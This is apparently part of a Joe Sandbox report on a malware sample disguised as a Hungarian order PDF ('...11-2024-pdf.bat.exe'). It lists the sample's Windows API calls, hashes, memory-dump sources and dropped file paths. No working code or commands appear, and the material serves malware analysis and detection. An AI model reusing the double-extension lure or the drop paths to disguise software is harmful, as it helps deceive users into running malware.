                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                              Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                              • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                              • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                              • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                              Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                              Download Yara Rule
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                              • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                              • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                              • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08

                                              Non-executed Functions

                                              Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                              • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                              • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                              • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                              • DeleteObject.GDI32(00000000), ref: 00404D5E
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                              • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                              • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                              • GlobalFree.KERNEL32(?), ref: 00405098
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                              • ShowWindow.USER32(?,00000000), ref: 00405237
                                              • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                              • ShowWindow.USER32(00000000), ref: 00405249
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 1638840714-813528018
                                              • Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                              • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                              • Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                              • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                              Function 004046EC Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                              • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                              • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
                                              • lstrcatW.KERNEL32(?,Call), ref: 0040485F
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$6B
                                              • API String ID: 2624150263-1518062809
                                              • Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                              • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                              • Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                              • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                              Function 6FBC1B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 6FBC121B: GlobalAlloc.KERNEL32(00000040,?,6FBC123B,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC1225
                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FBC1C6F
                                              • lstrcpyW.KERNEL32(00000008,?), ref: 6FBC1CB7
                                              • lstrcpyW.KERNEL32(00000808,?), ref: 6FBC1CC1
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC1CD4
                                              • GlobalFree.KERNEL32(?), ref: 6FBC1DB6
                                              • GlobalFree.KERNEL32(?), ref: 6FBC1DBB
                                              • GlobalFree.KERNEL32(?), ref: 6FBC1DC0
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC1FAA
                                              • lstrcpyW.KERNEL32(?,?), ref: 6FBC2144
                                              • GetModuleHandleW.KERNEL32(00000008), ref: 6FBC21B9
                                              • LoadLibraryW.KERNEL32(00000008), ref: 6FBC21CA
                                              • GetProcAddress.KERNEL32(?,?), ref: 6FBC2224
                                              • lstrlenW.KERNEL32(00000808), ref: 6FBC223E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                              • String ID:
                                              • API String ID: 245916457-0
                                              • Opcode ID: c0f4de0e8fdede6ac6ab6cb9c1d89afeb3fd4687e361d0ec2f7fb44386372877
                                              • Instruction ID: aade557fcc27bc1087b52bcc9ff92d386574397018567168259b432e6b62a581
                                              • Opcode Fuzzy Hash: c0f4de0e8fdede6ac6ab6cb9c1d89afeb3fd4687e361d0ec2f7fb44386372877
                                              • Instruction Fuzzy Hash: 4822BD71D0468ADADB10CFB8E5806EFB7B4FF06315F54462AD1A5FB280D7706A81CB52
                                              Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations, xrefs: 004021C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations
                                              • API String ID: 542301482-1905350178
                                              • Opcode ID: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                              • Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
                                              • Opcode Fuzzy Hash: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                              • Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                              Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                              • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                              • Opcode Fuzzy Hash: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                              • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                              Function 004043BA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                              • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                              • GetSysColor.USER32(?), ref: 0040449A
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                              • lstrlenW.KERNEL32(?), ref: 004044BB
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                              • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                              • SendMessageW.USER32(00000000), ref: 0040453D
                                              • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                              • SetCursor.USER32(00000000), ref: 004045BC
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                              • SetCursor.USER32(00000000), ref: 004045D8
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: 1C@$Call$N
                                              • API String ID: 3103080414-3974410273
                                              • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                              • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                              • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                              • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                              Download Yara Rule
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                              • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                              • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                              • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                              Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                              • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                              • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                              • wsprintfA.USER32 ref: 00405F4F
                                              • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                              • GlobalFree.KERNEL32(00000000), ref: 00406038
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
